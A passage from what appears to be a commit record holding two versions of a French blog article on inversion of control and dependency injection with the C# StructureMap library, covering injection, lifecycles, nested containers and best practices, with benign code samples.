m\u00e9canique de cr\u00e9ation d'instance (On peut cit\u00e9 par exemple Asp.Net MVC avec les ControllerFactory). C'est aussi une fa\u00e7on de faire qui est plus proche de la th\u00e9orie de l'inversion de contr\u00f4le car dans ce cas pr\u00e9cis il n'y a plus aucun appel direct de r\u00e9solution d'un d\u00e9pendant, le Container se pr\u00e9occupe de se qu'il sait faire de mieux, r\u00e9soudres les d\u00e9pendances !\n\nAu niveau de la m\u00e9canique d'injection des d\u00e9pendances nous avons vu les fondamentaux. Il faut savoir que la m\u00e9thode privili\u00e9gi\u00e9 par la plus part des d\u00e9veloppeurs est celle injectant les d\u00e9pendances par constructeur. Elle demande bien moins d'effort et \u00e9vite d'avoir des propri\u00e9t\u00e9s publique manipulable par le premier venu. Cependant il existe de nombreux cas ou l'insepection par propri\u00e9t\u00e9 est indispensanble (par exemple pour injecter des d\u00e9pendances dans des attributs), donc il ne faut pas non plus compl\u00e9tement \u00e9carter cette possibilit\u00e9. Personnellement j'utilise beaucoup l'injection par propri\u00e9t\u00e9 car \u00e7a permet d'avoir une grande compacit\u00e9 de code en plus d\u00e9viter de manipuler l'affectation des r\u00e9f\u00e9rences \u00e0 la main (je trouve que c'est plus clean sur ce point). Cependant quand je le fait je suis beaucoup plus stricte sur les r\u00e8gles de manipulation de ses instances. Il faut clairement que la responsabilit\u00e9 de leur manipulation soit faite uniquement par le d\u00e9pendant, sinon c'est la porte ouvert \u00e0 de nombreux probl\u00e8me.\n\n\n== Lifecycle\n\nDepuis le d\u00e9but de cette article la cr\u00e9ation des instances des d\u00e9pendances a \u00e9t\u00e9 compl\u00e9tement d\u00e9l\u00e9gu\u00e9 \u00e0 la classe Container. La grand question \u00e0 pr\u00e9sent est : Comment puis g\u00e9rer le cycle de vie des instances au sein de mon container ?\n\nStructureMap, comme tout les container IoC, met \u00e0 disposition un ensemble de m\u00e9thode et classe pour g\u00e9rer cela. Par d\u00e9faut lorsque l'ont ajouter une liaison entre un contrat et une impl\u00e9mentation, le container va d\u00e9finir leur cycle de vie \u00e0 l'\u00e9tat Transient. Cela veut dire qu'\u00e0 chaque fois qu'il r\u00e9soudra une d\u00e9pendance il cr\u00e9ra une instance. Il est tout fa\u00e7on possible de mettre explicitement la d\u00e9pendance dans le mode Transient :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Transient();\n----\n\nLogiquement si l'on demande deux fois la d\u00e9pendance, la r\u00e9f\u00e9rence est diff\u00e9rente :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print False\n----\n\nUn cas r\u00e9gulier dans le cycle de vie des objets c'est l'instance unique. Pour le faire on utilise la m\u00e9thode Singleton :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Singleton();\n----\n\nEn cons\u00e9quence le test de r\u00e9f\u00e9rence que l'on a fait pr\u00e9cedement renvoie True :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print True\n----\n\nCes deux cas sont parmis les principaux que l'ont trouve dans le d\u00e9veloppement mais il en existe d'autre qui permettent de g\u00e9rer la vie de l'instance sur un Thread ou encore dans un container encapsuler dans un scope temporaire (ContainerScoped, utiliser pour g\u00e9rer notamment le cas de DNX).\n\nIl existe une autre fa\u00e7on de d\u00e9clarer un cycle de vie avec StructureMap. Dans la biblioth\u00e8que une interface ILifecycle permet d'impl\u00e9menter facilement sont propre cycle de vie. Il est ensuite possible de l'utiliser dans la configuration avec la m\u00e9thode LifecycleIs<T> (ou T impl\u00e9mente ILifecycle).\n\nWARNING: Les cycles de vies personnalis\u00e9s peuvent \u00eatre utils\u00e9 dans bien des cas. Il existe des biblioth\u00e8ques qui fournissent des cycles sp\u00e9cialis\u00e9s, comme pour le Web par exemple. Avec la version 4 de StructureMap l'\u00e9quipe de d\u00e9veloppement encouragement fortement a ne plus utilis\u00e9 se mode fonctionnement mais \u00e0 pr\u00e9f\u00e9rer l'utilisation du NestedContainer \u00e0 la place. Il permette de repondre \u00e0 95% des cas de figures sans avoir besoin de librairie annexe ni de code suppl\u00e9mentaire.\n\nComme indiquer dans la note au dessus les NestedContainer permette aussi de g\u00e9rer le cycle de vie des instances. En les utilisant on se simplifie clairement la vie car \u00e0 partir du moment ou le NestedContainer est r\u00e9cup\u00e9rer tout les instances qui sont obtenues lui sont propre. Il suffit ensuite d'appeller la m\u00e9thode Dispose pour le lib\u00e9rer. C'est une m\u00e9thode tr\u00e8s fl\u00e9xible puisqu'elle suffit d'\u00e9tablir un scope pour que cela fonctionne. En plus dans ce mode toutes les d\u00e9pendances qui implemente IDisposable sont Dispose lors de l'appel \u00e0 la m\u00e9thode sur le NestedContainer. Du coup les trois \u00e9tats de StructureMap suffisent \u00e0 g\u00e9rer tous les cas, y compris ceux li\u00e9e au context Web. Pour illustrer cela un Scope simple peut \u00eatre imagin\u00e9 : L'\u00e9xecution d'une ligne de code. Dans ce cas voici les \u00e9tapes qui va falloir faire pour le mettre en place :\n\n* Le NestedContainer est cr\u00e9e et d\u00e9marrer le Scope\n* Le code voulut est execut\u00e9\n* Le NestedContainer lib\u00e8re les d\u00e9pendances.\n\nCes trois \u00e9tapes peuvent bien \u00e9videment \u00eatre rejouer \u00e0 l'infinit. Pour illustrer le bon fonctionnement du Dispose, un impl\u00e9mentation de ILogger disposable va \u00eatre utilis\u00e9 :\n\n[source,csharp]\n----\npublic class DisposableConsoleLogger : ConsoleLogger, IDisposable\n{\n\tpublic void Dispose()\n\t{\n\t\tConsole.WriteLine(\"Hello form Dispose !\");\n\t}\n}\n----\n\nPour la configuration rien ne change \u00e0 par le Use<T> qui utilise DisposableConsoleLogger :\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<DisposableConsoleLogger>();\n});\n----\n\nLe code des trois \u00e9tapes est le suivant :\n\n[source,csharp]\n----\nvar nested = container.GetNestedContainer();\nvar logger = nested.GetInstance<ILogger>();\nnested.Dispose();\/\/print Hello form Dispose !\n----\n\nPour illustrer l'isolation nette de se scope il suffit de l'inclure dans une boucle for et de test si la derni\u00e8re instance r\u00e9cup\u00e9rer est la m\u00eame que la courrant :\n\n[source,csharp]\n----\nILogger last = null;\nfor(var i = 0; i < 10; i++)\n{\n\tvar nested = container.GetNestedContainer();\n\tvar logger = nested.GetInstance<ILogger>();\n\tif (last != null)\n\tConsole.WriteLine(last == logger);\/\/print False\n\tlast = logger;\n\tnested.Dispose();\/\/print Hello form Dispose !\n}\n----\n\nAu final vraiement rien de compliqu\u00e9 avec le NestedContainer. C'est une technique puissante et tr\u00e8s \u00e9l\u00e9gante, il suffit juste de clairement d\u00e9finir son Scoping dans une application !\n\nArriver \u00e0 ce stade, le tour d'horizon de StructureMap est fait. Vous avez \u00e0 pr\u00e9sent les cl\u00e9s pour le mettre en place dans vos projets. L'exemple qui m'a servit pour \u00e9crire l'article est disponible sur Github Gist : https:\/\/gist.github.com\/Vtek\/7e5064a188417713a2d8[ici].\n\nPour finir je vous propose une derni\u00e8re petite partie sur les...\n\n\n== Best practices\n\nVoici un ensemble de r\u00e8gle qu'il est bon de suivre :\n\n* Masquer l'acc\u00e8s au Container : L'inversion de contr\u00f4le sert \u00e0 casser les adh\u00e9rances. Si vous utilise sp\u00e9cifiquement un Container pour r\u00e9soudre des d\u00e9pendances alors c'est l'inverse qui se produit. Il vaut donc mieux passer par une couche interm\u00e9diaire qui va vous permettre de changer le Container facileement si besoin.\n\n* Pr\u00e9f\u00e9re l'injection par constructeur : Elle ne demande pas de logique d'injection et est par cons\u00e9quent la mani\u00e8re la plus simple de la mettre en place !\n\n* N'oublier pas l'injection par propri\u00e9t\u00e9 : Certains cas ne sont pas traitable avec l'injection par constructeur, n'h\u00e9sitez surtout pas \u00e0 utiliser celle par propri\u00e9t\u00e9, elle est l\u00e0 pour \u00e7a !\n\n* Ne m\u00e9langer pas les cycles de vie : Beaucoup ont essayer et se sont casser les dents. Mise \u00e0 part le Singleton qui est simple \u00e0 comprendre et m\u00e9langer pour le reste abstenez-vous. En mixant le risque c'est que plus le projet grossit plus la grappe de r\u00e9tention entre les instances devient complexe. On peut vite arriver \u00e0 des situations hors de contr\u00f4le.\n\n* N'injectez pas des types primitifs : Techniquement c'est faisable mais c'est une erreur. Les d\u00e9pendant attentend des d\u00e9pendances d\u00e9finit par des contracts, les types primitifs ne r\u00e9pondent pas cela.\n\n* Ne faite pas de r\u00e9solution de d\u00e9pendance base sur des chaines de charact\u00e8re (Nom, Type, Namespace) : Ici encore techniquement c'est possible mais \u00e7a compl\u00e9xifie la maintenance et \u00e7a oblige \u00e0 revalider la configuration du Container \u00e0 chaque renommage de d\u00e9pendance, propri\u00e9t\u00e9, namespace. Au final vous allez perdre du temps et il y a d'autre fa\u00e7on de le faire bien plus \u00e9fficace.\n\n* Inutile de d\u00e9finir des cycles de vie, il vaut mieux utilis\u00e9 le Scoping : L'exemple des NestedContainer par de lui m\u00eame :)\n\n* Ne m\u00e9langer pas IoC et Reflexion : C'est une fausse bonne id\u00e9e. Se sont deux aspects bien diff\u00e9rents qui peuvent parfois aboutir au m\u00eame r\u00e9sultat mais qui n'ont pas du tout la m\u00eame vocation. Si vous en arriver \u00e0 faire de la r\u00e9flexion pour Activer des d\u00e9pendances dans ce cas l\u00e0 utiliser plut\u00f4t https:\/\/msdn.microsoft.com\/fr-fr\/library\/dd460648(v=vs.110).aspx[MEF] . Si se n'est pas le cas alors vous faites tr\u00e8s certainement quelque chose qu'un Container IoC fait d\u00e9j\u00e0 :)\n\n* Votre container ne devrait jamais \u00eatre utiliser dans des tests unitaires\n\n* Les d\u00e9pendances peuvent grossir en nombre rapidement. Pour mieux organiser leur configuration il existe dans StructureMap une classe appel\u00e9 Registry. Cette classe permet de grouper la configuration par domaine de d\u00e9pendance.\n\n* Avec l'inversion de contr\u00f4le la r\u00e9solution des d\u00e9pendances se fait au runtime. C'est donc l'application qui doit tenir les r\u00e9f\u00e9rences. Inutile d'essayer de les masquer, vous ne gagnerez pas plus de temps ni de confort de d\u00e9veloppement !\n\n\n== Conclusion\n\nS'en est finit pour cette article. J'\u00e9sp\u00e8re que vous aurez apr\u00e9ci\u00e9 la lecture. L'inversion de contr\u00f4le est un concept qui de nos jours doit \u00eatre connu, car de nombreux projets le mettent en oeuvre. StructureMap est un excellente biblioth\u00e8que. J'aurais aim\u00e9 vous pr\u00e9sentez de ses capacit\u00e9s mais elles sont tellement nombreuses qu'il faudrait plusieurs articles pour tout traiter !\n","old_contents":"= Inverser le contr\u00f4le avec StructueMap !\n:hp-image: introduction-a-angular2.png\n:published_at: 2015-12-02\n:hp-tags: C#, IoC, StructureMap\n\n\nL'inversion de contr\u00f4le (aka *IoC*) est un pattron d'architecture permettant de casser les adh\u00e9renses entre les d\u00e9pendances. Ce d\u00e9couplage permet au d\u00e9pendances de haut niveau de ne plus reposer directement sur celle de bas niveau et de passer par une couche d'abstration. L'objectif est d'am\u00e9liorer la modularit\u00e9 des applications afin de faciliter les \u00e9tapes de maintenance et d'\u00e9volution.\n\n\n== Pourquoi ce pattern ?\n\nAvant de montrer la mise en place de l'inversion de contr\u00f4le il est pr\u00e9f\u00e9rable d'expliquer comment on en est arriv\u00e9 l\u00e0 !\n\nLe probl\u00e8me de d\u00e9part est assez simple en r\u00e9alit\u00e9. Si on a une application d\u00e9velopp\u00e9e en couche et que l'ont fait reposer chaqu'une d'elle sur une autre de plus bas niveau, que va-t-il se passer si par la suite on veut changer, modifier, supprimer la couche la plus basse ? Le probl\u00e8me est l\u00e0, il va falloir modifier la couche de plus haut niveau pour l'adapter en cons\u00e9quence. Il est d'ailleurs fort probable que cela d\u00e9clencher des modification en cascade sur toutes les couches haut niveau.\n\nAvec l'inversion de contr\u00f4le on va plut\u00f4t faire reposer chaque couche sur une abstraction afin de passer de \u00e7a :\n\n[Sch\u00e9ma]\n\nA \u00e7a :\n\n[Sch\u00e9ma]\n\nLa diff\u00e9rence est suptile mais importante. Dans le second sh\u00e9mas, changer les couches concr\u00eates de mon application n'entraine pas de probl\u00e8mes de structure, tout compilera. Mieux encore, le d\u00e9veloppement de l'application peut \u00eatre abstrait et n'avoir aucunes connaissances du fonctionnement bas niveau. Plus fort, je peux d\u00e9finir des abstractions utilis\u00e9s par les couches de bas niveau qui sont impl\u00e9ment\u00e9es en haut niveau. Un autre int\u00e9ressant, les test unitaires deviennent beaucoup plus simple et pertinent car les d\u00e9pendances ne rentre plus en compte dans l'\u00e9tape de validation.\n\nAu final en utilisant l'inversion de contr\u00f4le, votre application va devenir plus modulaire, souple, maintenable, \u00e9volutive et testable.\n\nNOTE: L'inversion de contr\u00f4le permet aussi de respecter un des principes majeurs de https:\/\/en.wikipedia.org\/wiki\/SOLID_(object-oriented_design)[SOLID] : l'inversion des d\u00e9pendances. Ce principe d\u00e9finit qu'il faut toujours d\u00e9pendre des abstractions et non des impl\u00e9mentations. Les principes SOLID sont consid\u00e9rer par beaucoup comme les _\"Best Pratices\"_ de la POO. Ils permettent d'avoir un d\u00e9veloppement \u00e9fficace et fiable.\n\nParmis les mani\u00e8res les plus courrante de mettre en place l'IoC, il existe :\n\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Factory_(object-oriented_programming)[Factory] qui permet de d\u00e9l\u00e9gu\u00e9 la cr\u00e9ation d'instance. Une approche rudimentaire mais qui a le m\u00e9rite d'\u00eatre simple dans sa mise en place.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Service_locator_pattern[Service Locator] qui via l'utilisation d'un registrer permet de retourver des impl\u00e9mentations correspondant \u00e0 des contrats.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Dependency_injection[Dependancy injection] qui permet de passer une d\u00e9pendance \u00e0 un object d\u00e9pendant.\n\nLa suite de l'article va se concentrer sur le troisi\u00e8me pattern, Depenceny Injection. Factory est un pattern trop simplice pour permettre de r\u00e9soudre les d\u00e9pendances \u00e0 lui seul et Service Locator est devenu au fil du temps un anti-pattern (notamment parce qu'il cr\u00e9e de l'ah\u00e9rence alors que c'est l'inverse que l'ont veut).\n\n\n== StructureMap en action : les bases !\n\nIl existe de nombreuse biblioth\u00e8que d\u00e9di\u00e9e \u00e0 l'IoC. Sinc\u00e9rement il n'y a pas de mauvais choix m\u00eame si j'ai tendance \u00e0 d\u00e9conseiller celle de Microsoft (https:\/\/github.com\/unitycontainer\/unity[Unity]) qui est \u00e0 la traine par rapport \u00e0 la concurrence. Pour ma part j'ai longtemps utilis\u00e9 Ninject pour son c\u00f4t\u00e9 _\"Simple & Straightforward\"_, tr\u00e8s \u00e9fficace en d\u00e9veloppement bien qu'un peu lent \u00e0 l'execution il faut l'admettre. Derni\u00e8rement j'ai d\u00e9cid\u00e9 de changer et je me suis mis sur StructureMap, un container historique (le premier en C#) qui embarque d'innombrables capacit\u00e9s pour un niveau de performance tr\u00e8s correct. C'est un bon compromis entre capacit\u00e9 et puissance et depuis la version 3 l'\u00e9quipe \u00e0 fait un gros travail pour se rapporcher de l'approche de Ninject. De plus il est en d\u00e9veloppement actif depuis presque 10 ans, il dispose d'une documentation riche et compl\u00e8te et est le premier \u00e0 disposer d'un support pour DNX avec la version 4. C'est cette version que l'on va utilis\u00e9 aujourd'hui !\n\nPour installer le package StructureMap il suffit d'ajouter le package Nuget via la commande :\n\n----\nInstall-Package StructureMap\n----\n\nLa premi\u00e8re classe qui va nous int\u00e9resser est Container. C'est l'\u00e9l\u00e9ment centrale de la librairie. Elle va nous permettre de d\u00e9finir les d\u00e9pendances \u00e0 r\u00e9soudres, leur fa\u00e7on d'\u00eatre r\u00e9solut et leur r\u00e9cup\u00e9ration.\nPour d\u00e9finir une d\u00e9pendance il nous faut un contract. Pour les besoins de l'article je vais en d\u00e9finir un :\n\n[source,csharp]\n----\npublic interface ILogger\n{\n\tvoid Information(string message);\n}\n----\n\nL'interface correspond \u00e0 un logger qui va tracer un message d'information. Son impl\u00e9mentation est la suivante :\n\n[source,csharp]\n----\npublic class ConsoleLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tConsole.WriteLine(message);\n\t}\n}\n----\n\nPour r\u00e9soudre cette d\u00e9pendance via le container il faut la d\u00e9finir. La classe poss\u00e8de un constructeur acceptant en param\u00e8tre une action qui expose un object de configuration. Cette object permet de d\u00e9finir les liaisons entre contrat et impl\u00e9mentation \u00e0 l'aide des m\u00e9thodes For<T> et Use<T> :\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n----\n\nCes deux m\u00e9thodes disposent d'une surcharge qui permet de passer en param\u00e8tre des object Type. Le r\u00e9sultat est le m\u00eame mais syntaxiquement c'est plus lourd \u00e0 lire. Il li\u00e9 le contrat \u00e0 une impl\u00e9mentation il existe aussi la m\u00e9thode Add<T>, ce code fonctionne donc aussi :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<Logger>();\n----\n\nNOTE: Il existe une diff\u00e9renciation tr\u00e8s nette entre les deux m\u00e9thode. Add<T> permet d'ajouter une impl\u00e9mentation alors que Use<T> d\u00e9finit l'implementation comme strictement \u00e0 utiliser. En cons\u00e9quence lors que vous utilisez Use<T> c'est toujours la derni\u00e8re liaison \u00e0 une impl\u00e9mentation qui l'emporte.\n\nParfois il est n\u00e9cessaire de d\u00e9finir comment le Container va cr\u00e9er l'instance, dans se cas il est possible d'utilise une surcharge de la m\u00e9thode Use qui accept en param\u00e8tre une Function qui a en param\u00e8tre le context du containeret qui retourne une instance correspondant au contrat :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use(\"Logger instance creation\", (x) =>\n{\n\treturn new ConsoleLogger();\n});\n----\n\nLa d\u00e9pendance est \u00e0 pr\u00e9sent d\u00e9finit. Le code ne contient pas de logique de cr\u00e9ation des impl\u00e9mentations c'est donc l'instance de la class Container qui va donc les construire pour nous. Il est possible de les r\u00e9cup\u00e9rer en appelant la m\u00e9thode GetInstance<T>() :\n\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\n----\n\nWARNING: Attention, la m\u00e9thode GetInstance<T> peut tr\u00e8s bien accepter des types impl\u00e9ment\u00e9s sans que cela ne pose de probl\u00e8mes. Cependant en faisant \u00e7a il y a une rupture avec le principe SOLID d'inversion de d\u00e9pendance. N'oubliez pas : Il faut d\u00e9pendre des abstractions, pas des impl\u00e9mentations.\n\nSi une d\u00e9pendance n'est pas d\u00e9finit et que l'ont souhaite la r\u00e9soudre, l'instance de Container l\u00e9ve une Exception de configuration. Il peut y avoir des cas o\u00f9 l'ont ne sait pas si une liaison est \u00e9tablie entre un contrat et une impl\u00e9mentation. Dans ce cas il vaut mieux utiliser la m\u00e9thode TryGetInstance<T> et tester si l'instance est retourn\u00e9e est null, c'est plus optimis\u00e9 que de traiter le cas avec un bloc try catch :\n\n[source,csharp]\n----\n\/\/Aucune impl\u00e9mentation de IDisposable n'est configur\u00e9s actuellement\nvar disposable = container.GetInstance<IDisposable>();\nConsole.WriteLine(disposable == null);\/\/print True\n----\n\nLa m\u00e9thode Add<T> permettant de d\u00e9finir plusieurs impl\u00e9mentation d'un m\u00eame contrat, il existe une m\u00e9thode GetAllInstances<T>() qui renvoie l'ensemble des impl\u00e9mentations correspondante. Si on rajoute une nouvelle impl\u00e9mentation de ILogger :\n\n[source,csharp]\n----\npublic class FileLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tFile.WriteAllText(\"log.txt\", message);\n\t}\n}\n----\n\nEt qu'on l'ajoute les deux impl\u00e9mentations dans la configuration :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\nconfiguration.For<ILogger>().Add<FileLogger>();\n----\n\nL'appel \u00e0 la m\u00e9thode renverra une instance de IEnumerable<ILogger> :\n\n[source,csharp]\n----\nvar loggers = container.GetAllInstances<ILogger>();\nConsole.WriteLine(loggers.Count() == 2);\/\/print True\n----\n\nA ce stade vous avez les bases pour r\u00e9soudre des d\u00e9pendances. Cependant l'utilisation actuelle du Container correspond \u00e0 peu de chose pr\u00eat au pattern ServiceLocator. On aurait aussi pu faire une Factory pour g\u00e9rer la cr\u00e9ation d'instance. Il est donc temps de s'int\u00e9resser \u00e0 l'injection des d\u00e9pendances.\n\n== Injection\n\nPour injecter les d\u00e9pendances il nous faut une classse plus haut niveau qui repose sur le contrat \u00e9tablit dans ILogger. Pour continuer avec un cas simple prenons l'exemple d'un controlleur qui, lors de l'\u00e9xecution d'une action, trace une information via le logger. Si l'ont veut casser l'adh\u00e9rence il faut passer la d\u00e9pendance impl\u00e9mentant ILogger via le constructeur :\n\n[source,csharp]\n----\npublic class Controller\n{\n\tprivate ILogger _logger;\n\n\tpublic Controller(ILogger logger)\n\t{\n\t\t_logger = logger;\n\t}\n\n\tpublic void Action()\n\t{\n\t\tthis._logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nApr\u00e8s avoir configurer le Container pour li\u00e9 une des deux impl\u00e9mentations de ILogger, il est possible de r\u00e9cup\u00e9rer une instance de la classe Controller via la m\u00e9thode GetInstance<T>() :\n\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n\nvar controller = container.GetInstance<Controller>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nJ'en vois d\u00e9j\u00e0 qui vont me r\u00e9pondre que j'ai mis un *Warning* plus haut concernant l'appel de GetInstance<T> sans utiliser une interface ! En r\u00e9alit\u00e9 dans ce cas les choses sont diff\u00e9rentes car Controller n'est pas une d\u00e9pandance mais un d\u00e9pendent. La r\u00e9solution est donc conforme au principe d'inversion de d\u00e9pendance. Cette mani\u00e8re de proc\u00e9der est une des plus couramment utilis\u00e9 dans le monde .Net (on l'a retrouve sous la forme de DependencyResolver dans les frameworks Microsoft).\n\nStructureMap offre aussi la possibilit\u00e9 d'injecter les d\u00e9pendances par inspection des propri\u00e9t\u00e9s plut\u00f4t que par le constructeur. C'est une alternative int\u00e9ressante et facile \u00e0 mettre en oeuvre. D\u00e9j\u00e0 cela permet de r\u00e9duire le code de la classe Controller \u00e0 :\n\n[source,csharp]\n----\npublic class Controller\n{\n\tpublic ILogger Logger { get; set; }\n\n\tpublic void Action()\n\t{\n\t\tthis.Logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nPar d\u00e9faut StructureMap ne r\u00e9soudera pas la d\u00e9pendance en l'\u00e9tat. Dans la configuration il faut, lors de la liaison entre un contrat et son impl\u00e9mentation, utiliser la m\u00e9thode Setter pour sp\u00e9cifier quelle type de d\u00e9pendance sous jacente va \u00eatre injecter : \n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>().Is<ConsoleLogger>();\n----\n\nLa m\u00e9thode Setter<T> dispose d'une surcharge qui permet d'injecter \u00e0 condition que le nom de la propri\u00e9t\u00e9 match avec celui pass\u00e9 en argument :\n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>(\"Logger\").Is<ConsoleLogger>();\n----\n\nNOTE: Cette surcharge peut s'av\u00e9rer pratique, mais attention au renommage, on a vite fait d'oublier d'aller modifier la configuration du Container !\n\nUne fois mise en place il suffit de demander \u00e0 r\u00e9cup\u00e9rer une instance d'une d\u00e9pendance pour que celle ci soit automatiquement injecter avec celle sous-jacente :\n\n[source,csharp]\n----\n\/\/Avec Setter<T> il devient obligatoire de demander une instance correspondant \u00e0 un contrat.\n\/\/IController doit donc \u00eatre d\u00e9finit dans votre code pour que cela fonctionne\nvar controller = container.GetInstance<IController>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nCette premi\u00e8re fa\u00e7on de faire est certes \u00e9fficace mais imaginez faire cela pour toutes les d\u00e9pendances... ce n'est pas tr\u00e8s \u00e9l\u00e9gant. En plus il devient compliquer de r\u00e9soudre les d\u00e9pendances sur des instances d\u00e9pendant qu'on voudrait r\u00e9soudre avec le container. Il existe donc une m\u00e9thode plus \u00e9fficace pour mettre en place l'injection par propri\u00e9t\u00e9 : D\u00e9finir des conventions dans le registre des Policies du Container. Pour cela les d\u00e9veloppeurs de StructureMap on tout pr\u00e9vu, il existe une m\u00e9thode SetAllProperties qui attent en param\u00e8tre une action exposant une instance de la classe SetterConvention :\n\n[source,csharp]\n----\nconfiguration.Policies.SetAllProperties(convention => {\n\n});\n----\n\nPlusieurs possibil\u00e9s sont offertes pour d\u00e9finir une convention. La plus simple est celle qui d\u00e9finit une \u00e9xigence de type stricte :\n\n[source,csharp]\n----\nconvention.OfType<ILogger>();\n----\n\nUne convention par namespace peut \u00eatre \u00e9tablit, elle permet de d\u00e9clencher l'injection de la d\u00e9pendance uniquement sur les Type appartenant \u00e0 ce namespace. Deux possibilit\u00e9 de d\u00e9claration, Soit par nom :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespace(\"MyNamespace\");\n----\n\nSoit en utilisant le namespace d'un type en particulier :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespaceContainingType<ILogger>();\n----\n\nCes trois exemples de convention permettent de traiter pas mal de cas. La classe SetterConvention offre plusieurs autres possibilit\u00e9s pour customiser sa logique d'injection. Le mieux c'est de les essayer pour voir celle qui conviennent aux besoins.\n\nSans s'en rendre compte, en utilisant les conventions, une nouvelle capacit\u00e9s du Container a \u00e9t\u00e9 d\u00e9v\u00e9rouiller, le BuildUp ! Il est maintenant possible de se dispenser d'utiliser la m\u00e9thode GetInstance<T>() pour obtenir une instance d'un d\u00e9pendant avec ses d\u00e9pendances inject\u00e9es :\n\n[source,csharp]\n----\nvar controller = new Controller();\ncontainer.BuildUp(controller);\n----\n\nL'int\u00e9r\u00eat premier est qu'avec cette technique on va pouvoir injecter les d\u00e9pendances d'une instance dont la cr\u00e9ation est faite par un tier. Mine de rien cela ouvre pas mal de possibilit\u00e9 et permet de s'interfacer avec d'autre Framework ou Api qui poss\u00e8de leur propre m\u00e9canique de cr\u00e9ation d'instance (On peut cit\u00e9 par exemple Asp.Net MVC avec les ControllerFactory). C'est aussi une fa\u00e7on de faire qui est plus proche de la th\u00e9orie de l'inversion de contr\u00f4le car dans ce cas pr\u00e9cis il n'y a plus aucun appel direct de r\u00e9solution d'un d\u00e9pendant, le Container se pr\u00e9occupe de se qu'il sait faire de mieux, r\u00e9soudres les d\u00e9pendances !\n\nAu niveau de la m\u00e9canique d'injection des d\u00e9pendances nous avons vu les fondamentaux. Il faut savoir que la m\u00e9thode privili\u00e9gi\u00e9 par la plus part des d\u00e9veloppeurs est celle injectant les d\u00e9pendances par constructeur. Elle demande bien moins d'effort et \u00e9vite d'avoir des propri\u00e9t\u00e9s publique manipulable par le premier venu. Cependant il existe de nombreux cas ou l'insepection par propri\u00e9t\u00e9 est indispensanble (par exemple pour injecter des d\u00e9pendances dans des attributs), donc il ne faut pas non plus compl\u00e9tement \u00e9carter cette possibilit\u00e9. Personnellement j'utilise beaucoup l'injection par propri\u00e9t\u00e9 car \u00e7a permet d'avoir une grande compacit\u00e9 de code en plus d\u00e9viter de manipuler l'affectation des r\u00e9f\u00e9rences \u00e0 la main (je trouve que c'est plus clean sur ce point). Cependant quand je le fait je suis beaucoup plus stricte sur les r\u00e8gles de manipulation de ses instances. Il faut clairement que la responsabilit\u00e9 de leur manipulation soit faite uniquement par le d\u00e9pendant, sinon c'est la porte ouvert \u00e0 de nombreux probl\u00e8me.\n\n\n== Lifecycle\n\nDepuis le d\u00e9but de cette article la cr\u00e9ation des instances des d\u00e9pendances a \u00e9t\u00e9 compl\u00e9tement d\u00e9l\u00e9gu\u00e9 \u00e0 la classe Container. La grand question \u00e0 pr\u00e9sent est : Comment puis g\u00e9rer le cycle de vie des instances au sein de mon container ?\n\nStructureMap, comme tout les container IoC, met \u00e0 disposition un ensemble de m\u00e9thode et classe pour g\u00e9rer cela. Par d\u00e9faut lorsque l'ont ajouter une liaison entre un contrat et une impl\u00e9mentation, le container va d\u00e9finir leur cycle de vie \u00e0 l'\u00e9tat Transient. Cela veut dire qu'\u00e0 chaque fois qu'il r\u00e9soudra une d\u00e9pendance il cr\u00e9ra une instance. Il est tout fa\u00e7on possible de mettre explicitement la d\u00e9pendance dans le mode Transient :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Transient();\n----\n\nLogiquement si l'on demande deux fois la d\u00e9pendance, la r\u00e9f\u00e9rence est diff\u00e9rente :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print False\n----\n\nUn cas r\u00e9gulier dans le cycle de vie des objets c'est l'instance unique. Pour le faire on utilise la m\u00e9thode Singleton :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Singleton();\n----\n\nEn cons\u00e9quence le test de r\u00e9f\u00e9rence que l'on a fait pr\u00e9cedement renvoie True :\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print True\n----\n\nCes deux cas sont parmis les principaux que l'ont trouve dans le d\u00e9veloppement mais il en existe d'autre qui permettent de g\u00e9rer la vie de l'instance sur un Thread ou encore dans un container encapsuler dans un scope temporaire (ContainerScoped, utiliser pour g\u00e9rer notamment le cas de DNX).\n\nIl existe une autre fa\u00e7on de d\u00e9clarer un cycle de vie avec StructureMap. Dans la biblioth\u00e8que une interface ILifecycle permet d'impl\u00e9menter facilement 